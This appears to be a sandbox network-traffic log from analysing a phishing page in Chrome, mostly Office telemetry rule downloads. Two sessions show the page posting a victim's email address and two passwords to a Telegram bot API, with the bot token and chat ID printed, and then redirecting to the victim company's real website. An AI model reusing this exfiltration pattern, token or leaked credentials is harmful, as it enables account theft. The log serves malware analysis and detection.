                                                                                                                      x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075504Z-174f7845968kvnqxhC1EWRmf3g0000000sag00000000bda2
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:05 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      46192.168.2.449807149.154.167.2204434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:06 UTC522OUTOPTIONS /bot7615492389:AAFVZ9OmchXY56FM3hDvp-X0kY0cMmXg2qE/sendMessage HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: keep-alive
                                                                                                                      Accept: */*
                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                      Access-Control-Request-Headers: cache-control,content-type
                                                                                                                      Origin: null
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:06 UTC359INHTTP/1.1 204 No Content
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:06 GMT
                                                                                                                      Connection: close
                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Allow-Headers: cache-control,content-type
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      47192.168.2.44980413.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:06 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:07 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:06 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 419
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                      x-ms-request-id: 2132beec-901e-00ac-46aa-42b69e000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075506Z-174f7845968jrjrxhC1EWRmmrs00000015rg000000006ww1
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:07 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      48192.168.2.44980613.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:06 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:07 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:06 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 494
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                      x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075506Z-174f7845968kdththC1EWRzvxn0000000hzg000000005d4z
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:07 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      49192.168.2.44980913.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:06 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:07 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:07 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 472
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                                      x-ms-request-id: c0407c6d-d01e-0082-369d-43e489000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075507Z-174f7845968cpnpfhC1EWR3afc00000015cg0000000002xu
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:07 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      50192.168.2.44980813.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:06 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:07 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:07 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 420
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                                      x-ms-request-id: 06c834e2-b01e-0001-1c8a-4346e2000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075507Z-174f7845968zgtf6hC1EWRqd8s0000000ygg0000000099qa
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:07 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      51192.168.2.44981013.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:06 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:07 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:07 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 427
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                                      x-ms-request-id: b5d3fb3c-c01e-000b-6fb4-42e255000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075507Z-174f78459684bddphC1EWRbht40000001590000000009zat
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:07 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      52192.168.2.449811149.154.167.2204434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:08 UTC630OUTPOST /bot7615492389:AAFVZ9OmchXY56FM3hDvp-X0kY0cMmXg2qE/sendMessage HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: keep-alive
                                                                                                                      Content-Length: 360
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/json
                                                                                                                      cache-control: no-cache
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Origin: null
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:08 UTC360OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 35 39 37 36 32 32 33 35 38 30 22 2c 22 74 65 78 74 22 3a 22 3d 3d 3d 20 47 45 4e 45 52 41 4c 20 52 65 5a 75 6c 54 20 3d 3d 3d 5c 72 5c 6e 45 6d 61 69 6c 3a 20 48 62 61 72 64 69 65 6e 40 69 74 6e 61 6c 65 64 69 2e 63 6f 2e 7a 61 5c 72 5c 6e 50 61 73 73 77 6f 72 64 31 3a 20 41 40 46 51 37 62 76 4f 73 23 55 51 45 5c 72 5c 6e 50 61 73 73 77 6f 72 64 32 3a 20 50 71 4a 72 44 71 4e 23 3e 64 5c 72 5c 6e 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 5c 6e 52 65 67 69 6f 6e 3a 20 4e 65 77 20 59 6f 72 6b 5c 6e 43 69 74 79 3a 20 4e 65 77 20 59 6f 72 6b 5c 6e 43 6f 75 6e 74 72 79 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 5c 72 5c 6e 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20
                                                                                                                      Data Ascii: {"chat_id":"5976223580","text":"=== GENERAL ReZulT ===\r\nEmail: Hbardien@itnaledi.co.za\r\nPassword1: A@FQ7bvOs#UQE\r\nPassword2: PqJrDqN#>d\r\nIP Address: 8.46.123.228\nRegion: New York\nCity: New York\nCountry: United States\r\nUser-Agent: Mozilla/5.0
                                                                                                                      2024-12-03 07:55:08 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:08 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 709
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-03 07:55:08 UTC709INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 31 35 34 39 32 33 38 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 72 6d 65 64 69 77 6f 72 6b 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 72 6d 65 64 69 77 6f 72 6b 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 39 37 36 32 32 33 35 38 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 72 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 64 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 72 5f 4d 65 64 69 5f 37 37 37 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 31 32 35 30 38 2c 22 74
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":44,"from":{"id":7615492389,"is_bot":true,"first_name":"Mrmediworks","username":"Mrmediworksbot"},"chat":{"id":5976223580,"first_name":"Mr","last_name":"Medi","username":"Mr_Medi_777","type":"private"},"date":1733212508,"t


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      53192.168.2.44981213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:08 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:09 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:09 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 486
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                                      x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075509Z-174f7845968n2hr8hC1EWR9cag00000015cg000000000b6r
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:09 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      54192.168.2.449814196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:08 UTC667OUTGET / HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:11 UTC472INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:09 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Pingback: https://www.itnaledi.co.za/xmlrpc.php
                                                                                                                      Link: <https://www.itnaledi.co.za/wp-json/>; rel="https://api.w.org/", <https://www.itnaledi.co.za/wp-json/wp/v2/pages/551>; rel="alternate"; type="application/json", <https://www.itnaledi.co.za/>; rel=shortlink
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      2024-12-03 07:55:11 UTC7720INData Raw: 32 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c
                                                                                                                      Data Ascii: 2000<!doctype html><html lang="en-US" class="no-js"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" /><meta name='robots' content='index, follow, max-image-preview:l
